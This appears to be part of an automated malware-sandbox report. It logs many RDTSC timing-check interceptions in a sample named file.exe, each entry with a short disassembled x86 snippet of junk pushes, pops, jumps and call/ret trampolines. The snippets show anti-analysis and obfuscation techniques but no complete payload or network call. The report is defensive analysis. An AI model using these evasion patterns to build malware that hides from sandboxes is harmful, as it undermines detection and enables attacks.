Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5B152 second address: E5B156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5B2A3 second address: E5B2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5B2A9 second address: E5B2C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4AB1Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D11E second address: E5D124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D124 second address: E5D128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D773 second address: E5D777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D859 second address: E5D85D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D94F second address: E5D973 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4A619h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D9E3 second address: E5DA03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F450CC4AB1Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5EB2F second address: E5EB60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4A617h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5EB60 second address: E5EBF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F450CC4AB18h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 movsx edi, si 0x00000028 mov edi, dword ptr [ebp+122D1B19h] 0x0000002e push 00000000h 0x00000030 and edi, dword ptr [ebp+122D2969h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007F450CC4AB18h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 00000018h 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 mov esi, dword ptr [ebp+122D26D0h] 0x00000058 mov esi, dword ptr [ebp+122D29D5h] 0x0000005e xchg eax, ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F450CC4AB26h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FC65 second address: E5FCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007F450CC4A61Ah 0x0000000b popad 0x0000000c nop 0x0000000d pushad 0x0000000e mov eax, dword ptr [ebp+1247F65Bh] 0x00000014 sub edx, dword ptr [ebp+122D3219h] 0x0000001a popad 0x0000001b push 00000000h 0x0000001d mov di, dx 0x00000020 push 00000000h 0x00000022 jl 00007F450CC4A60Ch 0x00000028 jmp 00007F450CC4A60Fh 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edi 0x00000032 pop edi 0x00000033 pop eax 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E60462 second address: E60481 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F450CC4AB25h 0x00000008 jmp 00007F450CC4AB1Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E61C42 second address: E61C48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E60F9A second address: E60F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E61C48 second address: E61C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A612h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E60F9E second address: E60FAC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E61C5E second address: E61C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E60FAC second address: E60FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E61C62 second address: E61C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F450CC4A617h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E61C85 second address: E61C9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F450CC4AB21h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E61C9E second address: E61D01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A613h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F450CC4A608h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov esi, dword ptr [ebp+122D205Fh] 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e mov dword ptr [ebp+122D2195h], edx 0x00000034 pop esi 0x00000035 add di, F52Ch 0x0000003a push 00000000h 0x0000003c sub edi, dword ptr [ebp+122D297Dh] 0x00000042 mov esi, 4EA567A9h 0x00000047 push eax 0x00000048 pushad 0x00000049 je 00007F450CC4A60Ch 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E667DA second address: E667DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E677E0 second address: E677EE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F450CC4A606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E677EE second address: E677F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E677F2 second address: E67856 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F450CC4A608h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov bx, si 0x0000002a push 00000000h 0x0000002c and bl, 0000002Eh 0x0000002f push 00000000h 0x00000031 or edi, dword ptr [ebp+122D2E28h] 0x00000037 jmp 00007F450CC4A616h 0x0000003c xchg eax, esi 0x0000003d jbe 00007F450CC4A61Ch 0x00000043 push eax 0x00000044 push edx 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E686CF second address: E686D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E679C1 second address: E679DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007F450CC4A606h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F450CC4A60Bh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E679DF second address: E679E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F450CC4AB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E688E7 second address: E688ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E695E5 second address: E695E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E679E9 second address: E67A76 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F450CC4A606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D233Eh] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F450CC4A608h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b pushad 0x0000003c jbe 00007F450CC4A606h 0x00000042 movsx eax, cx 0x00000045 popad 0x00000046 mov eax, dword ptr [ebp+122D0B9Dh] 0x0000004c add dword ptr [ebp+122D2730h], esi 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push eax 0x00000057 call 00007F450CC4A608h 0x0000005c pop eax 0x0000005d mov dword ptr [esp+04h], eax 0x00000061 add dword ptr [esp+04h], 0000001Dh 0x00000069 inc eax 0x0000006a push eax 0x0000006b ret 0x0000006c pop eax 0x0000006d ret 0x0000006e mov ebx, dword ptr [ebp+122DB252h] 0x00000074 nop 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E695E9 second address: E695EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E67A76 second address: E67A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E68987 second address: E6898C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E695EF second address: E695F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E67A7A second address: E67A80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E67A80 second address: E67A8A instructions: 0x00000000 rdtsc 0x00000002 js 00007F450CC4A60Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6975E second address: E6978B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4AB24h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6B522 second address: E6B526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6C5D1 second address: E6C5F5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F450CC4AB27h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6C5F5 second address: E6C5FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A6AA second address: E6A6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6C5FA second address: E6C67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F450CC4A606h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e movsx ebx, di 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F450CC4A608h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D1A0Ch], edx 0x00000033 jmp 00007F450CC4A60Fh 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b jnp 00007F450CC4A609h 0x00000041 pop ebx 0x00000042 xchg eax, esi 0x00000043 jmp 00007F450CC4A60Ch 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c jmp 00007F450CC4A616h 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A6B3 second address: E6A6D7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f je 00007F450CC4AB16h 0x00000015 jmp 00007F450CC4AB1Eh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6C67D second address: E6C682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A6D7 second address: E6A6DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A6DD second address: E6A6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A6E1 second address: E6A6E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6D7E8 second address: E6D7FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A611h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A794 second address: E6A7A2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E70804 second address: E70818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F450CC4A60Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E70818 second address: E70893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F450CC4AB21h 0x0000000d nop 0x0000000e mov ebx, dword ptr [ebp+122D1AA2h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F450CC4AB18h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov ebx, dword ptr [ebp+122D2A89h] 0x00000038 xchg eax, esi 0x00000039 jl 00007F450CC4AB20h 0x0000003f pushad 0x00000040 jo 00007F450CC4AB16h 0x00000046 push edx 0x00000047 pop edx 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jno 00007F450CC4AB16h 0x00000053 jmp 00007F450CC4AB22h 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E70893 second address: E7089D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F450CC4A606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7089D second address: E708A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E718BD second address: E71908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a add bx, 371Ah 0x0000000f push 00000000h 0x00000011 mov ebx, 1C91E7DDh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F450CC4A608h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 cmc 0x00000033 push eax 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F450CC4A610h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E729E4 second address: E729F5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E729F5 second address: E72A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F450CC4A606h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6E8B0 second address: E6E8B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6E8B5 second address: E6E8BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E748EC second address: E748F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E748F1 second address: E748F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6E8BB second address: E6E8C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6E8C8 second address: E6E8CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E75907 second address: E759B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F450CC4AB18h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 jmp 00007F450CC4AB28h 0x00000028 and ebx, 7EFE7F4Dh 0x0000002e push 00000000h 0x00000030 sub dword ptr [ebp+122D2EC5h], eax 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F450CC4AB18h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 or dword ptr [ebp+122D2CD4h], edi 0x00000058 xchg eax, esi 0x00000059 pushad 0x0000005a jmp 00007F450CC4AB27h 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F450CC4AB21h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6F983 second address: E6F9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4A612h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6F9A1 second address: E6F9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7969F second address: E796C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A610h 0x00000009 jmp 00007F450CC4A611h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7A0FC second address: E7A102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7E5F0 second address: E7E60F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F450CC4A615h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7EA35 second address: E7EA40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F450CC4AB16h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7EA40 second address: E7EA51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A60Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7EA51 second address: E7EA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F450CC4AB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E70A4C second address: E70A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F450CC4A606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E71A59 second address: E71A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E71A5D second address: E71A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E71A6C second address: E71A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E71A71 second address: E71A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E71B29 second address: E71B2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E71B2D second address: E71B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E71B33 second address: E71B44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F450CC4AB1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E72BB1 second address: E72BBB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F450CC4A60Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
